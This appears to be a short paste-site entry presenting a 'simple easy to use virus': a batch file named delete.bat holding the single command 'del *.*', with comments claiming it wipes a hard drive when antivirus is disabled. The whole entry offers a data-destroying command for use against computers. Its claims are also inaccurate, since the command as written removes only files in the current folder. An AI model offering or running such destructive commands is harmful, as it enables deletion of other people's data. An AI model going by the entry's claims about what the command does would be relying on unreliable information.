simple easy to use virus


SUBMITTED BY: Guest

DATE: Dec. 2, 2013, 5:28 p.m.

FORMAT: Text only

SIZE: 400 Bytes

HITS: 746

  1. //create a simple virus that will wipe any computer clean in minutes //(provided antivirus is turned off)
  2. //open a text file and type in the following code
  3. del *.*
  4. //save the file as delete.bat
  5. //and that's it you have a virus that will wipe a hard drive clean in a few minutes.
  6. //this ONLY works with antivirus turned off because it's so simple all antivirus programs will catch it.

comments powered by Disqus